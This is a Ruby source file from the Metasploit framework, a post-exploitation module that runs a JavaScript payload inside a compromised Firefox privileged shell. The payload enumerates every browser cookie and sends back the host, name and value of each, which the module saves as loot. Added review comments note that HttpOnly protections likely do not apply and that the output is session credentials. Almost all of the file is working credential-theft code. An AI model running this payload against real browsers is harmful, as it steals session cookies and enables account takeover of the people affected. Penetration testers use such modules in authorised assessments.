rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/firefox/gather/cookies.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
# Post module that collects cookies through an already-established Firefox
# privileged JavaScript shell session.
#
# Flow, as visible in this file:
#   1. #js_payload builds a JavaScript snippet that walks the browser's cookie
#      manager and sends back a JSON array of {host, name, value} objects, each
#      field base64-encoded.
#   2. #run executes that snippet via js_exec, parses the JSON reply, and stores
#      the reply as loot.
#
# NOTE(review): the snippet reads cookies through the browser's cookie manager
# service rather than through page script, so page-level restrictions such as
# HttpOnly presumably do not limit what is returned — confirm. Loot produced
# here should be treated as session credentials.
class MetasploitModule < Msf::Post
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # Registers module metadata and the single TIMEOUT option.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox Gather Cookies from Privileged JavaScript Shell',
        'Description' => %q{
          This module allows collection of cookies from a Firefox Privileged JavaScript Shell.
        },
        'License' => MSF_LICENSE,
        'Author' => ['joev'],
        'DisclosureDate' => '2014-03-26',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    # TIMEOUT is not read anywhere in this file; presumably the mixin's js_exec
    # consumes it — confirm against the mixin.
    timeout_opt = OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
    register_options([timeout_opt])
  end

  # Runs the cookie-enumeration payload in the session and records the result.
  #
  # An empty/blank response is ignored. A response that is not valid JSON
  # (for example the exception the payload sends from its catch branch) is
  # printed as a warning instead of being stored.
  def run
    response = js_exec(js_payload)
    return unless response.present?

    begin
      parsed = JSON.parse(response)

      # Decode every field in place; the decoded copy is only used for the
      # cookie count in the status message below.
      parsed.each do |cookie|
        cookie.transform_values! { |encoded| Rex::Text.decode_base64(encoded) }
      end

      # The loot file receives the raw response, so its host/name/value fields
      # remain base64-encoded on disk.
      loot_path = store_loot('firefox.cookies.json', 'text/json', rhost, response)
      print_good("Saved #{parsed.length} cookies to #{loot_path}")
    rescue JSON::ParserError
      print_warning(response)
    end
  end

  # Builds the JavaScript executed inside the privileged shell.
  #
  # The script obtains nsICookieManager, iterates its enumerator, and for each
  # nsICookie pushes base64-encoded host, name and value; other cookie
  # attributes are not collected. Errors are sent back as-is via send(e).
  #
  # @return [String] the payload with surrounding whitespace stripped
  def js_payload
    %|
      (function(send){
        try {
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
          var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]
                        .getService(Components.interfaces.nsICookieManager);
          var cookies = [];
          var iter = cookieManager.enumerator;
          while (iter.hasMoreElements()){
            var cookie = iter.getNext();
            if (cookie instanceof Components.interfaces.nsICookie){
              cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)})
            }
          }
          send(JSON.stringify(cookies));
        } catch (e) {
          send(e);
        }
      })(this.send);
    |.strip
  end
end